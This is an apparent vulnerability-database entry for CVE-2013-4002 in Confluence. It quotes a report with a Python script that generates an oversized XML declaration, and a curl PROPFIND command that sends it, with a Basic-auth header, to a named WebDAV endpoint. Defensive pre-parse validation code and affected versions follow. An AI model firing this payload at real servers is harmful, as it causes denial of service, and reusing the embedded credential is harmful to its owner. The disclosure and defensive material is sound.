CVSS2: 7.1 High
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: COMPLETE
Vector: AV:N/AC:M/Au:N/C:N/I:N/A:C
EPSS: 0.019 Low
EPSS Percentile: 87.0%
{quote}
There is a WebDAV endpoint accessible via the following URL:
https://pwnie.ninja/confluence/plugins/servlet/confluence/default . It is possible to pass XML as data for a
PROPFIND request.
The following Python code will generate XML with a long pseudo-attribute name that exploits the CVE-2013-4002
issue.
{code}
#!/usr/bin/env python
# Python 2 script (raw_input / print statement), as posted in the report
import os

outdir = raw_input('specify output directory > ')
# XML declaration carrying a 3,000,000-byte pseudo-attribute name ahead of 'version'
xml = "<?xml " + "\xe7\x9a\x84"*1000000 + "='china' version = '1.0'?><a />"
with open(os.path.join(outdir, 'cve2013-4002.xml'), 'w') as out:
    out.write(xml)

def sizeof(num, suffix='B'):
    # human-readable byte count
    for unit in ['', 'Ki', 'Mi', 'Gi', 'Ti', 'Pi', 'Ei', 'Zi']:
        if abs(num) < 1024.0:
            return "%3.1f%s%s" % (num, unit, suffix)
        num /= 1024.0
    return "%.1f%s%s" % (num, 'Yi', suffix)

print "[+] File 'cve2013-4002.xml':", sizeof(len(xml))
{code}
According to the XML specification there are only three valid pseudo-attributes: version, encoding and
standalone. When we submit any random pseudo-attribute with a long name, the secure version of the Xerces-J
parser just ignores it. At the same time the vulnerable version will try to parse it. This will require much CPU
work.
If you try to send this request with curl, you will see that there is no immediate answer from the server. You
will get a "Gateway Time-out" answer from the server after 4 minutes.
{code}
curl -X 'PROPFIND' -H 'Depth: 0' -H 'Content-Type: application/xml' \
  -H 'Authorization: Basic Z3IzM2t3YXJpb3I6c2ExODEyODM5MSE=' --data-binary \
  '@/tmp/cve2013-4002.xml' \
  https://pwnie.ninja/confluence/plugins/servlet/confluence/default
{code}
{quote}
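The report above rests on one detail of the XML 1.0 grammar: the declaration is `<?xml VersionInfo EncodingDecl? SDDecl? S? ?>`, so only version, encoding and standalone may appear, in that order. The following is an added example, not Confluence's or Xerces' code, of a bounded pre-check a WebDAV front end could apply to a request body before handing it to the XML parser: it looks at a fixed number of leading bytes, rejects a declaration that is not closed within that window, and rejects any pseudo-attribute name outside the three the grammar allows. The function name, the 256-byte bound and the sample bodies are all constructed for this example; the real fix remains the patched parser (Confluence 5.8.9 per the table below).

```python
import re

# Pseudo-attributes the XML 1.0 declaration may carry, in grammar order:
# <?xml VersionInfo EncodingDecl? SDDecl? S? ?>
ALLOWED_PSEUDO_ATTRS = ("version", "encoding", "standalone")

# One pseudo-attribute: whitespace, a Name (ASCII or high bytes), '=', a quoted value.
_PSEUDO_ATTR = re.compile(
    rb"\s+([A-Za-z_:\x80-\xff][-A-Za-z0-9_.:\x80-\xff]*)\s*=\s*(['\"])([^'\"]*)\2"
)


def check_xml_declaration(body, max_decl_len=256):
    """Validate the XML declaration at the start of `body` (bytes).

    Returns (True, reason) when the body may be passed on to the XML parser and
    (False, reason) when it should be rejected. Only the first `max_decl_len`
    bytes are ever examined, so the cost of this check is bounded no matter how
    large the submitted document is.
    """
    head = body[:max_decl_len]
    if head.startswith(b"\xef\xbb\xbf"):  # a UTF-8 BOM may precede the declaration
        head = head[3:]
    if not head.startswith(b"<?xml"):
        return True, "no XML declaration"
    end = head.find(b"?>")
    if end == -1:
        return False, "XML declaration not closed within %d bytes" % max_decl_len
    decl = head[5:end]  # pseudo-attribute area between '<?xml' and '?>'

    names = []
    pos = 0
    while True:
        m = _PSEUDO_ATTR.match(decl, pos)
        if m is None:
            break
        name = m.group(1).decode("utf-8", "replace")
        if name not in ALLOWED_PSEUDO_ATTRS:
            return False, "unknown pseudo-attribute %r" % name
        names.append(name)
        pos = m.end()
    if decl[pos:].strip():  # leftover text that is not a well-formed pseudo-attribute
        return False, "malformed XML declaration"
    if not names or names[0] != "version":
        return False, "XML declaration must start with version"
    # Order must follow the grammar (version, encoding, standalone) with no repeats.
    order = [ALLOWED_PSEUDO_ATTRS.index(n) for n in names]
    if order != sorted(order) or len(set(order)) != len(order):
        return False, "pseudo-attributes out of order or repeated: %r" % names
    return True, "ok"


# Constructed sample bodies (not taken from a real request):
GOOD = (b"<?xml version='1.0' encoding='UTF-8'?>"
        b"<D:propfind xmlns:D='DAV:'><D:allprop/></D:propfind>")
# Same shape as the report's payload, scaled down: a long non-ASCII name before 'version'.
LONG_NAME = b"<?xml " + b"\xe7\x9a\x84" * 1000 + b"='china' version='1.0'?><a />"
SHORT_NAME = b"<?xml " + b"\xe7\x9a\x84" * 3 + b"='china' version='1.0'?><a />"
OUT_OF_ORDER = b"<?xml encoding='UTF-8' version='1.0'?><a/>"

if __name__ == "__main__":
    for label, sample in [("good", GOOD), ("long name", LONG_NAME),
                          ("short unknown name", SHORT_NAME), ("out of order", OUT_OF_ORDER)]:
        print("%-20s %s" % (label, check_xml_declaration(sample)))
```

The two rejection paths matter for different reasons: the length bound stops the check itself from scanning a multi-megabyte name, and the name whitelist catches the same trick when the attacker keeps the name short. Neither replaces the parser upgrade; they only keep a known-bad body away from an unpatched parser and give the request log a reason string to alert on.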
CPE | Name | Operator | Version
---|---|---|---
 | confluence | le | 5.7.4
 | confluence | lt | 5.8.9